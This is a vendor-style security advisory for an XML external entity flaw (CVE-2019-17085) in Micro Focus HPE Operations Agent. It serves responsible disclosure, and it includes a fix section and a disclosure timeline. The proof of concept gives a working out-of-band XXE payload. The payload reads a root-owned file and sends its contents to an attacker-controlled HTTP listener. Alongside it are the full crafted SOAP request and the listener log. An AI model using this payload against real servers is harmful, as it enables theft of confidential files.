usd-2019-0050 (CVE-2019-17085) | Micro Focus HPE Operations Agent

Advisory ID: usd-2019-0050
CVE ID: CVE-2019-17085
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17085
Affected Product: Micro Focus HPE Operations Agent
Affected Version: 12.04.006
Vulnerability Type: CWE-611 Improper Restriction of XML External Entity Reference
Security Risk: High
Vendor URL: https://www.microfocus.com/
Vendor Status: Partially Fixed

Description

This attack occurs when untrusted XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data, denial of service, Server Side Request Forgery (SSRF), port scanning from the perspective of the machine where the parser is located, and other system impacts.

Proof of Concept (PoC)

File to be read:

To show the exemplary impact of the vulnerability, the file "password.txt" with the content "s3crEtPa55w0rd" is created in the administrator's home directory on the vulnerable test server:

[root@testserver ~]# pwd
/root
[root@testserver ~]# ls -l password.txt
-r-------- 1 root root 15 Aug 20 11:53 password.txt
[root@testserver ~]# cat password.txt && echo ""
s3crEtPa55w0rd!

Three XML entities are defined inside the "ev.xml" file. In the first step, the content of the file "password.txt" is read with the help of the keyword "SYSTEM" and stored within the entity "data".

The second step allows the attacker to send the content of the entity "data" to an URL under his control. In this PoC, the content is then sent to the localhost on port 8080.

[pentest@testserver www]$ cat ev.xml
<!ENTITY % data SYSTEM 'file:///root/password.txt'>
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1:8080/?%data;'>">

The following output shows the request prepared by the attacker which is supposed to be sent to the vulnerable server:

POST /com.hp.ov.eaagt.msga.hbp/bbcrpcserver HTTP/1.1
cache-control: no-cache
content-type: text/xml; charset=UTF-8
date: Mon, 19 Aug 2019 12:14:20 GMT
host: testserver:383
pragma: no-cache
senderid: e0259616-4e94-7582-0616-8d6e6075a371
soapaction: http://testserver/com.hp.ov.eaagt.msga.hbp/bbcrpcserver#HBP_HANDLER
targetid: unknown
targeturi: http://testserver/com.hp.ov.eaagt.msga.hbp/bbcrpcserver
user-agent: BBC 12.04.006; com.hp.ov.opc.reqs 00.00.000
Content-Length: 613

<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY % sp SYSTEM "http://127.0.0.1:8080/ev.xml">
%sp;
%param1;
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<HBP_HANDLER>
<serverName xsi:type="xs:string">&exfil;example.com</serverName>
<coreid xsi:type="xs:string">bf2147e4-eb74-75aa-1bb7-db1e4d06a771</coreid>
</HBP_HANDLER>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The attacker connects to the victims server on port 338 where the vulnerable application is running. Afterwards, the prepared request is sent containing the XML payload:

[pentest@testserver ~]$ telnet 127.0.0.1 383
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
POST /com.hp.ov.eaagt.msga.hbp/bbcrpcserver HTTP/1.1
cache-control: no-cache
content-type: text/xml; charset=UTF-8
date: Mon, 19 Aug 2019 12:14:20 GMT
host: testserver:383
pragma: no-cache
senderid: e0259616-4e94-7582-0616-8d6e6075a371
soapaction: http://testserver/com.hp.ov.eaagt.msga.hbp/bbcrpcserver#HBP_HANDLER
targetid: unknown
targeturi: http://testserver/com.hp.ov.eaagt.msga.hbp/bbcrpcserver
user-agent: BBC 12.04.006; com.hp.ov.opc.reqs 00.00.000
Content-Length: 613

<!DOCTYPE test [
<!ELEMENT test ANY>
<!ENTITY % sp SYSTEM "http://127.0.0.1:8080/ev.xml">
%sp;
%param1;
]>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<SOAP-ENV:Body>
<HBP_HANDLER>
<serverName xsi:type="xs:string">&exfil;example.com</serverName>
<coreid xsi:type="xs:string">bf2147e4-eb74-75aa-1bb7-db1e4d06a771</coreid>
</HBP_HANDLER>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

The server parses the XML payload contained in the attacker's request and processes the external part of the DTD at the URL "http://127.0.0.1:8080/ev.xml". As a result, the server accesses the internal file "password.txt", reads it and sends its contents as a GET parameter to the address defined by the attacker.

The attacker's http listener displays the content of the "password.txt" file:

[pentest@testserver www]$ python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
127.0.0.1 - - [20/Aug/2019 12:02:54] "GET /ev.xml HTTP/1.1" 200 -
127.0.0.1 - - [20/Aug/2019 12:02:54] "GET /?s3crEtPa55w0rd! HTTP/1.1" 301 -
127.0.0.1 - - [20/Aug/2019 12:02:54] "GET /?s3crEtPa55w0rd!/ HTTP/1.1" 200 –

Fix

The safest way to prevent XXE and exponential entity expansion attacks is always to disable DTDs (External Entities) completely. Additionally, there is a Cheat Sheet on XXE prevention published by <a href="https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html" target="_blank">OWASP</a>.

 

References

Timeline

  • 2019-08-20: Initial notification sent to security-alert@hpe.com

  • 2019-08-20: After HPE's response: Advisory sent to security@microfocus.com
  • 2019-08-30: Reminder sent to security@microfocus.com
  • 2019-09-05: Reminder sent to security@microfocus.com
  • 2019-09-05: Contact request sent via web form at https://softwaresupport.softwaregrp.com/psrt

  • 2019-09-23: Reminder sent via web form at https://softwaresupport.softwaregrp.com/psrt
  • 2019-10-11: Micro Focus replies that there is a mitigation already configurable and that they are working on a security alert. Our retest shows, that setting the xpl.net.DISABLE_EXT_ENTITIES option mitigates arbitrary file reading using a XML external entity attack, but fails to mitigate exponential entity expansion attacks.
  • 2022-02-25: Security advisory released by usd AG.

Credits

This security vulnerability was identified by Tobias Neitzel of usd AG.